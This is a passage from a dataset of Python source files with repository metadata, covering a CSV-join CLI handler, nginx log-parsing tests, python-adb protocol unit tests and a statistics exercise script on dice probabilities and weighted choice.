Dataset schema (39 columns; ⌀ marks nullable columns):

| column | dtype | range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 5 to 2.06M |
| ext | string | 10 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 3 to 248 |
| max_stars_repo_name | string | length 5 to 125 |
| max_stars_repo_head_hexsha | string | length 40 to 78 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 ⌀ | 1 to 191k |
| max_stars_repo_stars_event_min_datetime | string ⌀ | length 24 |
| max_stars_repo_stars_event_max_datetime | string ⌀ | length 24 |
| max_issues_repo_path | string | length 3 to 248 |
| max_issues_repo_name | string | length 5 to 125 |
| max_issues_repo_head_hexsha | string | length 40 to 78 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 ⌀ | 1 to 67k |
| max_issues_repo_issues_event_min_datetime | string ⌀ | length 24 |
| max_issues_repo_issues_event_max_datetime | string ⌀ | length 24 |
| max_forks_repo_path | string | length 3 to 248 |
| max_forks_repo_name | string | length 5 to 125 |
| max_forks_repo_head_hexsha | string | length 40 to 78 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 ⌀ | 1 to 105k |
| max_forks_repo_forks_event_min_datetime | string ⌀ | length 24 |
| max_forks_repo_forks_event_max_datetime | string ⌀ | length 24 |
| content | string | length 5 to 2.06M |
| avg_line_length | float64 | 1 to 1.02M |
| max_line_length | int64 | 3 to 1.03M |
| alphanum_fraction | float64 | 0 to 1 |
| count_classes | int64 | 0 to 1.6M |
| score_classes | float64 | 0 to 1 |
| count_generators | int64 | 0 to 651k |
| score_generators | float64 | 0 to 1 |
| count_decorators | int64 | 0 to 990k |
| score_decorators | float64 | 0 to 1 |
| count_async_functions | int64 | 0 to 235k |
| score_async_functions | float64 | 0 to 1 |
| count_documentation | int64 | 0 to 1.04M |
| score_documentation | float64 | 0 to 1 |

One record per source file follows: metadata first, then the file content, then the per-file statistics.

hexsha: 0cdfbe0659d37b3cc8cc00e18f2f0edb48d21d4a | size: 3,410 | ext: py | lang: Python
file: src/scs_airnow/cmd/cmd_csv_join.py | repo: south-coast-science/scs_airnow | head: 7f0657bd434aa3abe667f58bc971edaa00d0c24c | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
"""
Created on 22 Feb 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
source repo: scs_analysis
"""
import optparse
# --------------------------------------------------------------------------------------------------------------------
class CmdCSVJoin(object):
"""unix command line handler"""
def __init__(self):
"""
Constructor
"""
self.__parser = optparse.OptionParser(usage="%prog [-t TYPE] [-i] [-v] -l PREFIX PK FILENAME "
"-r PREFIX PK FILENAME", version="%prog 1.0")
# compulsory...
self.__parser.add_option("--left", "-l", type="string", nargs=3, action="store", dest="left",
help="output path prefix, primary key and filename for left-hand set")
self.__parser.add_option("--right", "-r", type="string", nargs=3, action="store", dest="right",
help="output path prefix, primary key and filename for right-hand set")
# optional...
self.__parser.add_option("--type", "-t", type="string", nargs=1, action="store", dest="type", default='INNER',
help="{ 'INNER' | 'LEFT' | 'RIGHT' | 'FULL' } (default 'INNER')")
self.__parser.add_option("--iso8601", "-i", action="store_true", dest="iso8601", default=False,
help="interpret the primary key as an ISO 8601 datetime")
self.__parser.add_option("--verbose", "-v", action="store_true", dest="verbose", default=False,
help="report narrative to stderr")
self.__opts, self.__args = self.__parser.parse_args()
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self):
if self.__opts.left is None or self.__opts.right is None:
return False
return True
# ----------------------------------------------------------------------------------------------------------------
@property
def type(self):
return self.__opts.type
@property
def left_prefix(self):
return None if self.__opts.left is None else self.__opts.left[0]
@property
def left_pk(self):
return None if self.__opts.left is None else self.__opts.left[1]
@property
def left_filename(self):
return None if self.__opts.left is None else self.__opts.left[2]
@property
def right_prefix(self):
return None if self.__opts.right is None else self.__opts.right[0]
@property
def right_pk(self):
return None if self.__opts.right is None else self.__opts.right[1]
@property
def right_filename(self):
return None if self.__opts.right is None else self.__opts.right[2]
@property
def iso8601(self):
return self.__opts.iso8601
@property
def verbose(self):
return self.__opts.verbose
# ----------------------------------------------------------------------------------------------------------------
def print_help(self, file):
self.__parser.print_help(file)
def __str__(self, *args, **kwargs):
return "CmdCSVJoin:{type:%s, left:%s, right:%s, iso8601:%s, verbose:%s}" % \
(self.type, self.__opts.left, self.__opts.right, self.iso8601, self.verbose)
avg_line_length: 31.284404 | max_line_length: 118 | alphanum_fraction: 0.509091 | count_classes: 3,152 | score_classes: 0.92434 | count_generators: 0 | score_generators: 0 | count_decorators: 854 | score_decorators: 0.25044 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,267 | score_documentation: 0.371554
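
A side note on the handler above: optparse stores a `nargs=3` option as a single 3-tuple, which is what the `left_prefix` / `left_pk` / `left_filename` properties index into. A minimal standalone sketch (the argv values are hypothetical):

```python
import optparse

# Same three-value option shape as CmdCSVJoin above; argv is a made-up example.
parser = optparse.OptionParser()
parser.add_option("--left", "-l", type="string", nargs=3, action="store", dest="left")
parser.add_option("--right", "-r", type="string", nargs=3, action="store", dest="right")

opts, args = parser.parse_args(
    ["-l", "praxis", "rec", "left.csv", "-r", "ref", "rec", "right.csv"]
)
print(opts.left)   # ('praxis', 'rec', 'left.csv')
print(opts.right)  # ('ref', 'rec', 'right.csv')
```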

hexsha: 0ce058cd8a6d65a8bc31474a1e02dc8c29923fe6 | size: 338 | ext: py | lang: Python
file: test/receive_message.py | repo: unknown-admin/easymq | head: e29b8f63402e385059ff8c263b0e7bb8e9fbd24b | licenses: ["Apache-2.0"]
stars: 1 (2020-04-20T14:01:34.000Z to 2020-04-20T14:01:34.000Z) | issues: null | forks: 1 (2022-02-18T08:18:08.000Z to 2022-02-18T08:18:08.000Z)
content:
import os
from easymq.mq import MQ
def receive(headers, body):
print("---->", body)
mq = MQ(
mq_user=os.environ.get("mq_user"),
password=os.environ.get("password"),
host_and_ports=[
(os.environ.get("host"), os.environ.get("port")),
],
func=receive,
queue_name="/queue/test_queue",
)
mq.receive()
avg_line_length: 16.095238 | max_line_length: 57 | alphanum_fraction: 0.612426 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 57 | score_documentation: 0.168639

hexsha: 0ce0840b66e590ef2a41c729b631412a225153c7 | size: 12,383 | ext: py | lang: Python
file: test/unit/agent/common/util/text.py | repo: dp92987/nginx-amplify-agent | head: 1b2eed6eab52a82f35974928d75044451b4bedaf | licenses: ["BSD-2-Clause"]
stars: 308 (2015-11-17T13:15:33.000Z to 2022-03-24T12:03:40.000Z) | issues: 211 (2015-11-16T15:27:41.000Z to 2022-03-28T16:20:15.000Z) | forks: 80 (2015-11-16T18:20:30.000Z to 2022-03-02T12:47:56.000Z)
content:
# -*- coding: utf-8 -*-
from hamcrest import *
from test.base import BaseTestCase
from amplify.agent.common.util.text import (
decompose_format, parse_line, parse_line_split
)
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
COMBINED_FORMAT = '$remote_addr - $remote_user [$time_local] "$request" ' + \
'$status $body_bytes_sent "$http_referer" "$http_user_agent"'
class UtilTextTestCase(BaseTestCase):
def test_decompose_format_regular(self):
keys, trie, non_key_patterns, first_value_is_key = decompose_format(
COMBINED_FORMAT, full=True
)
assert_that(keys, not_none())
assert_that(trie, not_none())
assert_that(non_key_patterns, not_none())
assert_that(first_value_is_key, equal_to(True))
assert_that(keys, equal_to([
'remote_addr', 'remote_user', 'time_local', 'request', 'status',
'body_bytes_sent', 'http_referer', 'http_user_agent'
]))
assert_that(non_key_patterns, equal_to([
' - ', ' [', '] "', '" ', ' ', ' "', '" "', '"'
]))
def test_decompose_format_different(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" ' + \
'"$http_user_agent" rt=$request_time ' + \
'ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
assert_that(keys, not_none())
assert_that(trie, not_none())
assert_that(non_key_patterns, not_none())
assert_that(first_value_is_key, equal_to(True))
assert_that(keys, equal_to([
'remote_addr', 'remote_user', 'time_local', 'request', 'status',
'body_bytes_sent', 'http_referer', 'http_user_agent',
'request_time', 'upstream_response_time', 'upstream_cache_status'
]))
assert_that(non_key_patterns, equal_to([
' - ', ' [', '] "', '" ', ' ', ' "', '" "', '" rt=', ' ut="',
'" cs='
]))
def test_parse_line(self):
keys, trie = decompose_format(COMBINED_FORMAT)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "GET /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_split(self):
keys, _, non_key_patterns, first_value_is_key = decompose_format(COMBINED_FORMAT, full=True)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "GET /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_non_standard_http_method(self):
keys, trie = decompose_format(COMBINED_FORMAT)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "PROPFIND /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_split_non_standard_http_method(self):
keys, _, non_key_patterns, first_value_is_key = decompose_format(
COMBINED_FORMAT, full=True
)
line = '127.0.0.1 - - [02/Jul/2015:14:49:48 +0000] "PROPFIND /basic_status HTTP/1.1" 200 110 "-" ' + \
'"python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['http_user_agent'], equal_to(
'python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-48-generic'
))
def test_parse_line_upstream_log_format(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="2.001, 0.345" cs=MISS'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
# check some complicated values
assert_that(results['request_time'], equal_to('0.010'))
assert_that(results['upstream_response_time'], equal_to('2.001, 0.345'))
def test_parse_line_split_upstream_log_format(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, _, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="2.001, 0.345" cs=MISS'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
# check some complicated values
assert_that(results['request_time'], equal_to('0.010'))
assert_that(results['upstream_response_time'], equal_to('2.001, 0.345'))
def test_parse_line_upstream_log_format_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time cs=$upstream_cache_status ut="$upstream_response_time"'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 cs=- ut="-"'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_response_time'], equal_to('-'))
assert_that(results['upstream_cache_status'], equal_to('-'))
def test_parse_line_split_upstream_log_format_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time cs=$upstream_cache_status ut="$upstream_response_time"'
keys, _, non_key_patterns, first_value_is_key = decompose_format(
log_format, full=True
)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 cs=- ut="-"'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_response_time'], equal_to('-'))
assert_that(results['upstream_cache_status'], equal_to('-'))
def test_parse_line_upstream_log_format_part_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, trie = decompose_format(log_format)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="-" cs=MISS'
results = parse_line(line, keys=keys, trie=trie)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
def test_parse_line_split_upstream_log_format_part_empty_upstreams(self):
log_format = '$remote_addr - $remote_user [$time_local] ' + \
'"$request" $status $body_bytes_sent "$http_referer" "$http_user_agent" ' + \
'rt=$request_time ut="$upstream_response_time" cs=$upstream_cache_status'
keys, _, non_key_patterns, first_value_is_key = decompose_format(log_format, full=True)
line = \
'1.2.3.4 - - [22/Jan/2010:19:34:21 +0300] "GET /foo/ HTTP/1.1" 200 11078 ' + \
'"http://www.rambler.ru/" "Mozilla/5.0 (Windows; U; Windows NT 5.1" rt=0.010 ut="-" cs=MISS'
results = parse_line_split(
line,
keys=keys,
non_key_patterns=non_key_patterns,
first_value_is_key=first_value_is_key
)
assert_that(results, not_none())
for key in keys:
assert_that(results, has_item(key))
assert_that(results[key], not_none())
# check the last value to make sure complete parse
assert_that(results['upstream_cache_status'], equal_to('MISS'))
avg_line_length: 42.407534 | max_line_length: 115 | alphanum_fraction: 0.605023 | count_classes: 11,847 | score_classes: 0.956715 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 4,765 | score_documentation: 0.384802
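
The tests above exercise `decompose_format`, which splits an nginx `log_format` string into `$variable` keys and the literal text between them. A minimal regex sketch of the same decomposition (illustrative only, not amplify-agent's actual implementation):

```python
import re

log_format = ('$remote_addr - $remote_user [$time_local] "$request" '
              '$status $body_bytes_sent "$http_referer" "$http_user_agent"')

# Keys are the $variable names; non-key patterns are the literals between them.
keys = re.findall(r'\$(\w+)', log_format)
non_key_patterns = [p for p in re.split(r'\$\w+', log_format) if p]

print(keys[:3])              # ['remote_addr', 'remote_user', 'time_local']
print(non_key_patterns[:3])  # [' - ', ' [', '] "']
```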

hexsha: 0ce1ead7fccfec4e0bc42fdbdc128b022ce3b62a | size: 9,982 | ext: py | lang: Python
file: test/adb_test.py | repo: bugobliterator/python-adb | head: 2f4f5bcdf5dab5ccf8bf58ff9e91cde4d134f1c0 | licenses: ["Apache-2.0"]
stars: 1,549 (2015-01-04T04:45:48.000Z to 2022-03-31T08:01:59.000Z) | issues: 174 (2015-01-04T04:47:39.000Z to 2022-03-24T10:42:12.000Z) | forks: 356 (2015-01-09T10:10:33.000Z to 2022-03-27T19:25:01.000Z)
content:
#!/usr/bin/env python
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for adb."""
from io import BytesIO
import struct
import unittest
from mock import mock
from adb import common
from adb import adb_commands
from adb import adb_protocol
from adb.usb_exceptions import TcpTimeoutException, DeviceNotFoundError
import common_stub
BANNER = b'blazetest'
LOCAL_ID = 1
REMOTE_ID = 2
class BaseAdbTest(unittest.TestCase):
@classmethod
def _ExpectWrite(cls, usb, command, arg0, arg1, data):
usb.ExpectWrite(cls._MakeHeader(command, arg0, arg1, data))
usb.ExpectWrite(data)
if command == b'WRTE':
cls._ExpectRead(usb, b'OKAY', 0, 0)
@classmethod
def _ExpectRead(cls, usb, command, arg0, arg1, data=b''):
usb.ExpectRead(cls._MakeHeader(command, arg0, arg1, data))
if data:
usb.ExpectRead(data)
if command == b'WRTE':
cls._ExpectWrite(usb, b'OKAY', LOCAL_ID, REMOTE_ID, b'')
@classmethod
def _ConvertCommand(cls, command):
return sum(c << (i * 8) for i, c in enumerate(bytearray(command)))
@classmethod
def _MakeHeader(cls, command, arg0, arg1, data):
command = cls._ConvertCommand(command)
magic = command ^ 0xFFFFFFFF
checksum = adb_protocol.AdbMessage.CalculateChecksum(data)
return struct.pack(b'<6I', command, arg0, arg1, len(data), checksum, magic)
@classmethod
def _ExpectConnection(cls, usb):
cls._ExpectWrite(usb, b'CNXN', 0x01000000, 4096, b'host::%s\0' % BANNER)
cls._ExpectRead(usb, b'CNXN', 0, 0, b'device::\0')
@classmethod
def _ExpectOpen(cls, usb, service):
cls._ExpectWrite(usb, b'OPEN', LOCAL_ID, 0, service)
cls._ExpectRead(usb, b'OKAY', REMOTE_ID, LOCAL_ID)
@classmethod
def _ExpectClose(cls, usb):
cls._ExpectRead(usb, b'CLSE', REMOTE_ID, 0)
cls._ExpectWrite(usb, b'CLSE', LOCAL_ID, REMOTE_ID, b'')
@classmethod
def _Connect(cls, usb):
return adb_commands.AdbCommands.Connect(usb, BANNER)
class AdbTest(BaseAdbTest):
@classmethod
def _ExpectCommand(cls, service, command, *responses):
usb = common_stub.StubUsb(device=None, setting=None)
cls._ExpectConnection(usb)
cls._ExpectOpen(usb, b'%s:%s\0' % (service, command))
for response in responses:
cls._ExpectRead(usb, b'WRTE', REMOTE_ID, 0, response)
cls._ExpectClose(usb)
return usb
def testConnect(self):
usb = common_stub.StubUsb(device=None, setting=None)
self._ExpectConnection(usb)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
def testConnectSerialString(self):
dev = adb_commands.AdbCommands()
with mock.patch.object(common.UsbHandle, 'FindAndOpen', return_value=None):
with mock.patch.object(adb_commands.AdbCommands, '_Connect', return_value=None):
dev.ConnectDevice(serial='/dev/invalidHandle')
def testSmallResponseShell(self):
command = b'keepin it real'
response = 'word.'
usb = self._ExpectCommand(b'shell', command, response)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(response, dev.Shell(command))
def testBigResponseShell(self):
command = b'keepin it real big'
# The data doesn't have to be big, the point is that it just concatenates
# the data from different WRTEs together.
responses = [b'other stuff, ', b'and some words.']
usb = self._ExpectCommand(b'shell', command, *responses)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(b''.join(responses).decode('utf8'),
dev.Shell(command))
def testUninstall(self):
package_name = "com.test.package"
response = 'Success'
usb = self._ExpectCommand(b'shell', ('pm uninstall "%s"' % package_name).encode('utf8'), response)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(response, dev.Uninstall(package_name))
def testStreamingResponseShell(self):
command = b'keepin it real big'
# expect multiple lines
responses = ['other stuff, ', 'and some words.']
usb = self._ExpectCommand(b'shell', command, *responses)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
response_count = 0
for (expected,actual) in zip(responses, dev.StreamingShell(command)):
self.assertEqual(expected, actual)
response_count = response_count + 1
self.assertEqual(len(responses), response_count)
def testReboot(self):
usb = self._ExpectCommand(b'reboot', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Reboot()
def testRebootBootloader(self):
usb = self._ExpectCommand(b'reboot', b'bootloader', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.RebootBootloader()
def testRemount(self):
usb = self._ExpectCommand(b'remount', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Remount()
def testRoot(self):
usb = self._ExpectCommand(b'root', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Root()
def testEnableVerity(self):
usb = self._ExpectCommand(b'enable-verity', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.EnableVerity()
def testDisableVerity(self):
usb = self._ExpectCommand(b'disable-verity', b'', b'')
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.DisableVerity()
class FilesyncAdbTest(BaseAdbTest):
@classmethod
def _MakeSyncHeader(cls, command, *int_parts):
command = cls._ConvertCommand(command)
return struct.pack(b'<%dI' % (len(int_parts) + 1), command, *int_parts)
@classmethod
def _MakeWriteSyncPacket(cls, command, data=b'', size=None):
if not isinstance(data, bytes):
data = data.encode('utf8')
return cls._MakeSyncHeader(command, size or len(data)) + data
@classmethod
def _ExpectSyncCommand(cls, write_commands, read_commands):
usb = common_stub.StubUsb(device=None, setting=None)
cls._ExpectConnection(usb)
cls._ExpectOpen(usb, b'sync:\0')
while write_commands or read_commands:
if write_commands:
command = write_commands.pop(0)
cls._ExpectWrite(usb, b'WRTE', LOCAL_ID, REMOTE_ID, command)
if read_commands:
command = read_commands.pop(0)
cls._ExpectRead(usb, b'WRTE', REMOTE_ID, LOCAL_ID, command)
cls._ExpectClose(usb)
return usb
def testPush(self):
filedata = b'alo there, govnah'
mtime = 100
send = [
self._MakeWriteSyncPacket(b'SEND', b'/data,33272'),
self._MakeWriteSyncPacket(b'DATA', filedata),
self._MakeWriteSyncPacket(b'DONE', size=mtime),
]
data = b'OKAY\0\0\0\0'
usb = self._ExpectSyncCommand([b''.join(send)], [data])
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
dev.Push(BytesIO(filedata), '/data', mtime=mtime)
def testPull(self):
filedata = b"g'ddayta, govnah"
recv = self._MakeWriteSyncPacket(b'RECV', b'/data')
data = [
self._MakeWriteSyncPacket(b'DATA', filedata),
self._MakeWriteSyncPacket(b'DONE'),
]
usb = self._ExpectSyncCommand([recv], [b''.join(data)])
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=usb, banner=BANNER)
self.assertEqual(filedata, dev.Pull('/data'))
class TcpTimeoutAdbTest(BaseAdbTest):
@classmethod
def _ExpectCommand(cls, service, command, *responses):
tcp = common_stub.StubTcp('10.0.0.123')
cls._ExpectConnection(tcp)
cls._ExpectOpen(tcp, b'%s:%s\0' % (service, command))
for response in responses:
cls._ExpectRead(tcp, b'WRTE', REMOTE_ID, 0, response)
cls._ExpectClose(tcp)
return tcp
def _run_shell(self, cmd, timeout_ms=None):
tcp = self._ExpectCommand(b'shell', cmd)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=tcp, banner=BANNER)
dev.Shell(cmd, timeout_ms=timeout_ms)
def testConnect(self):
tcp = common_stub.StubTcp('10.0.0.123')
self._ExpectConnection(tcp)
dev = adb_commands.AdbCommands()
dev.ConnectDevice(handle=tcp, banner=BANNER)
def testTcpTimeout(self):
timeout_ms = 1
command = b'i_need_a_timeout'
self.assertRaises(
TcpTimeoutException,
self._run_shell,
command,
timeout_ms=timeout_ms)
class TcpHandleTest(unittest.TestCase):
def testInitWithHost(self):
tcp = common_stub.StubTcp('10.11.12.13')
self.assertEqual('10.11.12.13:5555', tcp._serial_number)
self.assertEqual(None, tcp._timeout_ms)
def testInitWithHostAndPort(self):
tcp = common_stub.StubTcp('10.11.12.13:5678')
self.assertEqual('10.11.12.13:5678', tcp._serial_number)
self.assertEqual(None, tcp._timeout_ms)
def testInitWithTimeout(self):
tcp = common_stub.StubTcp('10.0.0.2', timeout_ms=234.5)
self.assertEqual('10.0.0.2:5555', tcp._serial_number)
self.assertEqual(234.5, tcp._timeout_ms)
def testInitWithTimeoutInt(self):
tcp = common_stub.StubTcp('10.0.0.2', timeout_ms=234)
self.assertEqual('10.0.0.2:5555', tcp._serial_number)
self.assertEqual(234.0, tcp._timeout_ms)
if __name__ == '__main__':
unittest.main()
avg_line_length: 31.588608 | max_line_length: 102 | alphanum_fraction: 0.696053 | count_classes: 8,982 | score_classes: 0.89982 | count_generators: 0 | score_generators: 0 | count_decorators: 3,106 | score_decorators: 0.31116 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,656 | score_documentation: 0.165899
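
For context on `_MakeHeader` in the tests above: every ADB packet starts with six little-endian uint32 fields (command, arg0, arg1, payload length, checksum, magic). A self-contained sketch of the same packing, with a plain additive byte sum standing in for `adb_protocol.AdbMessage.CalculateChecksum` (the payload is a made-up example):

```python
import struct

def make_adb_header(command, arg0, arg1, data):
    # Fold the 4-byte command (e.g. b'CNXN') into a little-endian integer.
    cmd = sum(c << (i * 8) for i, c in enumerate(bytearray(command)))
    magic = cmd ^ 0xFFFFFFFF            # magic is the command's bitwise complement
    checksum = sum(bytearray(data))     # simple additive checksum of the payload
    return struct.pack(b'<6I', cmd, arg0, arg1, len(data), checksum, magic)

header = make_adb_header(b'CNXN', 0x01000000, 4096, b'host::demo\0')
assert len(header) == 24  # six uint32 fields
```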

hexsha: 0ce32973b15677a9edaeef840f01f4ffb57eb837 | size: 6,149 | ext: py | lang: Python
file: 06_Statistik_und_Wahrscheinlichkeiten/Aufgabe.py | repo: felixdittrich92/numerisches_python | head: 0f895ee19b4fa3cf7ad38cd3dfe3cd7020ee34a7 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
from random import randint
import random  # used by cartesian_choice (random.choice)
import numpy as np
from collections import Counter
from pprint import pprint
import time
# Exercises: see the book
print('-------------Aufgabe 1-------------')
outcomes = [ randint(1,6) for _ in range(10000)]
even_pips = [ x for x in outcomes if x % 2 == 0]
greater_two = [ x for x in outcomes if x > 2]
combined = [ x for x in outcomes if x % 2 == 0 and x > 2]
print(len(even_pips)/len(outcomes))
print(len(greater_two)/len(outcomes))
print(len(combined)/len(outcomes))
print('-------------Aufgabe 2-------------')
def find_interval(x, partition):
""" find_interval -> i
"i" will be the index for which applies
partition[i] < x < partition[i+1], if such an index exists.
-1 otherwise
"""
for i in range(0, len(partition)):
if x < partition[i]:
return i-1
return -1
def weighted_choice(sequence, weights, bisection=False):
"""
weighted_choice selects a random element of
the sequence according to the weights list
"""
x = np.random.random()
w = [0] + list(np.cumsum(weights))
index = find_interval(x, w)
return sequence[index]
def process_datafile(filename):
""" process_datafile -> (universities,enrollments,total_number_of_students)
universities: list of University
namesenrollments: corresponding list with enrollments
total_number_of_students: over all universities"""
universities=[]
enrollments=[]
with open(filename) as fh:
total_number_of_students= 0
fh.readline()# get rid of descriptive first line
for line in fh:
line=line.strip()
*praefix, under, post, total = line.rsplit()
university = praefix[1:]
total = int(total.replace(",",""))
enrollments.append(total)
universities.append(" ".join(university))
total_number_of_students += total
return(universities, enrollments, total_number_of_students)
universities, enrollments, total_students = process_datafile("universities_uk.txt")
"""
for i in range(14):
print(universities[i], end=": ")
print(enrollments[i])
